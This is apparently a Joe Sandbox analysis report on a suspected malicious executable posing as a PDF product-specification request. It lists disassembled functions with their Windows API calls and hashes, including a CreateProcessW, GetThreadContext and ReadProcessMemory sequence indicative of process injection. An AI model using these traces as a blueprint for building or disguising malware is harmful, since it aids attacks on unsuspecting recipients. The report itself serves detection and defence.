                                                                                                                • String ID:
                                                                                                                • API String ID: 1144537725-0
                                                                                                                • Opcode ID: 6e98bc1b03cdcff1c2632fff9acac61bc6969f5293905c21ebada225479580e8
                                                                                                                • Instruction ID: ec2905a7ffe126488be58861b8064d9511f60175f0c83bed48fdeed6b55a68a9
                                                                                                                • Opcode Fuzzy Hash: 6e98bc1b03cdcff1c2632fff9acac61bc6969f5293905c21ebada225479580e8
                                                                                                                • Instruction Fuzzy Hash: 8E3193B55057019FDB20DF64D8857D7BBF4FB89718F00092EF6AA87240E7B1AA44CB52
                                                                                                                Function 00A45745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00A4949C,?,00008000), ref: 00A45773
                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00A4949C,?,00008000), ref: 00A84052
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: f98e1c9204a3d7a75a8f336db73325dfdd8589fe0c0b3a5d15f48b831c688157
                                                                                                                • Instruction ID: 97ea2288f3c7062c9c224019be8607d55409db7f1abc9ac773caf183c45a7a26
                                                                                                                • Opcode Fuzzy Hash: f98e1c9204a3d7a75a8f336db73325dfdd8589fe0c0b3a5d15f48b831c688157
                                                                                                                • Instruction Fuzzy Hash: 87019230545225B7E3305B6ACC0EF977F98EF46BB0F108311BA9D5A1E1C7B45855CB90
                                                                                                                Function 00A4B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A4BB4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Init_thread_footer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1385522511-0
                                                                                                                • Opcode ID: e994ca1bb312e2f09fcbc5a22b8e10ead51c46b5355a659b04e0b9c0ba0d1e99
                                                                                                                • Instruction ID: 248ad759350f6f401e899d6bd671bbef843b6b4062a2e053d65f4b68230bb06f
                                                                                                                • Opcode Fuzzy Hash: e994ca1bb312e2f09fcbc5a22b8e10ead51c46b5355a659b04e0b9c0ba0d1e99
                                                                                                                • Instruction Fuzzy Hash: 0A329B39A00209DFDF24CF64C994EBAB7F9EF84350F648059E915AB261C774ED81CBA1
                                                                                                                Function 0141CF7D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 0141D73B
                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0141D7D1
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0141D7F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 2438371351-0
                                                                                                                • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                                • Instruction ID: f22845cb35ca2dd8f59d82f931d0b1cd4776d1617e9f786a1a830094bb412faa
                                                                                                                • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                                • Instruction Fuzzy Hash: A612DD24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CB5A
                                                                                                                Function 00AC709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2948472770-0
                                                                                                                • Opcode ID: 7cdc332d57ea4db6718603fc33554c070e27b61a10a58b59c6fbf345a38b3f01
                                                                                                                • Instruction ID: ea4c7fbc63c98572624a6a10377172ee050a7e9721a699cec5bc9fa831740298
                                                                                                                • Opcode Fuzzy Hash: 7cdc332d57ea4db6718603fc33554c070e27b61a10a58b59c6fbf345a38b3f01
                                                                                                                • Instruction Fuzzy Hash: 38D14A34A04249DFCB14DF98C981EAEBBB5FF58310F254159E915AB391DB30AD81CF91
                                                                                                                Function 00A5FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction ID: 2f00e24855d43c40db6c983ade4e7e40c4ce887a0cee2aea238e85daf673d18d
                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction Fuzzy Hash: B931E075A001099FC718CF59D480969FBB6FB49306B6486B5E809CF656D731EDC5CBC0
                                                                                                                Function 00A44ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A44E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A44EDD,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E9C
                                                                                                                  • Part of subcall function 00A44E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A44EAE
                                                                                                                  • Part of subcall function 00A44E90: FreeLibrary.KERNEL32(00000000,?,?,00A44EDD,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44EC0
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44EFD
                                                                                                                  • Part of subcall function 00A44E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A83CDE,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E62
                                                                                                                  • Part of subcall function 00A44E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A44E74
                                                                                                                  • Part of subcall function 00A44E59: FreeLibrary.KERNEL32(00000000,?,?,00A83CDE,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E87
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2632591731-0
                                                                                                                • Opcode ID: 6563039b3464f708ea924191faa73969850466573d626e88095bc5e25e082287
                                                                                                                • Instruction ID: 1df3642670883f80dd30b2f1aba89197703d84b82cefdfb7d864858230c46ff6
                                                                                                                • Opcode Fuzzy Hash: 6563039b3464f708ea924191faa73969850466573d626e88095bc5e25e082287
                                                                                                                • Instruction Fuzzy Hash: F311E73A600205ABCF14FBB4DE03FED77A5AF84B10F10442EF542A61C1DE709A099750
                                                                                                                Function 00A78402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wsopen_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3347428461-0
                                                                                                                • Opcode ID: c631dca3831237243c4467e83d5b3ef6f5e8eee2ece6d6f8e53e73a7533b751f
                                                                                                                • Instruction ID: 57880f7d6c3832794b0fa46ac963b8f7c8db76db7e182673b9eb09c829da0fd5
                                                                                                                • Opcode Fuzzy Hash: c631dca3831237243c4467e83d5b3ef6f5e8eee2ece6d6f8e53e73a7533b751f
                                                                                                                • Instruction Fuzzy Hash: 7A11187590410AAFCB05DF58E94599B7BF5EF48314F108059F808AB312DA71DA21CBA5
                                                                                                                Function 00A6E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                • Instruction ID: 5167fd4ac39bd999f95acf60a23d39f2c6f826454ac9053a28c82680306663d2
                                                                                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                • Instruction Fuzzy Hash: ECF0283EA11A14AAD7327B79DE05B9A33B89F52370F108715F528931D2CB74D80286A6
                                                                                                                Function 00A74C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00A41129,00000000,?,00A72E29,00000001,00000364,?,?,?,00A6F2DE,00A73863,00B11444,?,00A5FDF5,?), ref: 00A74CBE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 2704ca45aa8abe07ef8cf67ab6f7248cefacf2f0a2c870d8861ed89b16c43a9e
                                                                                                                • Instruction ID: 3d43d94ff59a1191587caf273a7ef2707467de51ecb256b0428d60ca6739cf95
                                                                                                                • Opcode Fuzzy Hash: 2704ca45aa8abe07ef8cf67ab6f7248cefacf2f0a2c870d8861ed89b16c43a9e
                                                                                                                • Instruction Fuzzy Hash: B4F0B432607224A6DB225F629D05B9A3798AF497A1B19C511B91DA6184CB30DC0186A0
                                                                                                                Function 00A73820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 8e16aa8b1730f2cd44819b71179fd1adf281d3d2dc364a6cabddaa0c53c7d4e1
                                                                                                                • Instruction ID: 08a64d2941bce81f3e07dc223c30ad4a360c14c0ab06a74d5ee891f36b8a4540
                                                                                                                • Opcode Fuzzy Hash: 8e16aa8b1730f2cd44819b71179fd1adf281d3d2dc364a6cabddaa0c53c7d4e1
                                                                                                                • Instruction Fuzzy Hash: ADE0E533102225A6DF212F779D00FDA3768AB427B0F07C132BC1D92581CB31DD01A1E2
                                                                                                                Function 00A44F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44F6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 5e266e892101f284d95480ece97d583afe31ff96bc799640dd6db288a9040443
                                                                                                                • Instruction ID: a3552359ba4772745c96b2691375e1b40d8e2876e1a00ef71d1860a2b4552e8c
                                                                                                                • Opcode Fuzzy Hash: 5e266e892101f284d95480ece97d583afe31ff96bc799640dd6db288a9040443
                                                                                                                • Instruction Fuzzy Hash: D1F03979105752CFDB349F64D590A22BBF4AF587293208A7EE1EA82622CB319848DF10
                                                                                                                Function 00AACCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00A8EE51,00B03630,00000002), ref: 00AACD26
                                                                                                                  • Part of subcall function 00AACC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00AACD19,?,?,?), ref: 00AACC59
                                                                                                                  • Part of subcall function 00AACC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00AACD19,?,?,?,?,00A8EE51,00B03630,00000002), ref: 00AACC6E
                                                                                                                  • Part of subcall function 00AACC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00AACD19,?,?,?,?,00A8EE51,00B03630,00000002), ref: 00AACC7A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Pointer$Write
                                                                                                                • String ID:
                                                                                                                • API String ID: 3847668363-0
                                                                                                                • Opcode ID: 7f0859380400a100d1cde12fdaa282e28df161b30f60ffcd41ac7654178a4411
                                                                                                                • Instruction ID: 775c4d8267cc30a0ce24bf04b79ea86e1c109e07a922fa5ed692f3e10b706c4e
                                                                                                                • Opcode Fuzzy Hash: 7f0859380400a100d1cde12fdaa282e28df161b30f60ffcd41ac7654178a4411
                                                                                                                • Instruction Fuzzy Hash: 2EE0397A400614EFD7219F8AD9008AABBF8FF85260710852FE99682110D3B1AA14DB60
                                                                                                                Function 00A42DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A42DC4
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongNamePath_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 541455249-0
                                                                                                                • Opcode ID: 4312a60c02b718b9ceba664aaa94c0b2d0c58f62ef62df896ad440403dd988c6
                                                                                                                • Instruction ID: d1b92036262043ed951cf84b581d600d70f515473ea9b5d467ba111e6113d4d8
                                                                                                                • Opcode Fuzzy Hash: 4312a60c02b718b9ceba664aaa94c0b2d0c58f62ef62df896ad440403dd988c6
                                                                                                                • Instruction Fuzzy Hash: DCE0CD766001245BCB10E2989C05FDA77DDDFC8794F040072FD09D7248D960AD81C651
                                                                                                                Function 00A42B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A43908
                                                                                                                  • Part of subcall function 00A4D730: GetInputState.USER32 ref: 00A4D807
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A42B6B
                                                                                                                  • Part of subcall function 00A430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A4314E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                • String ID:
                                                                                                                • API String ID: 3667716007-0
                                                                                                                • Opcode ID: ddfa3b0d7f34b307f23fefe2c3839ec080341868e98124a24c854860aa484d81
                                                                                                                • Instruction ID: 4d486274d72aca89367a462de1de49559f05898dfdd19a441be71d303a545a12
                                                                                                                • Opcode Fuzzy Hash: ddfa3b0d7f34b307f23fefe2c3839ec080341868e98124a24c854860aa484d81
                                                                                                                • Instruction Fuzzy Hash: 13E0262B70020407CE04FB7899125AEF3498BD1321F80093EF24243263CE6046868312
                                                                                                                Function 00A8039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00A80704,?,?,00000000,?,00A80704,00000000,0000000C), ref: 00A803B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
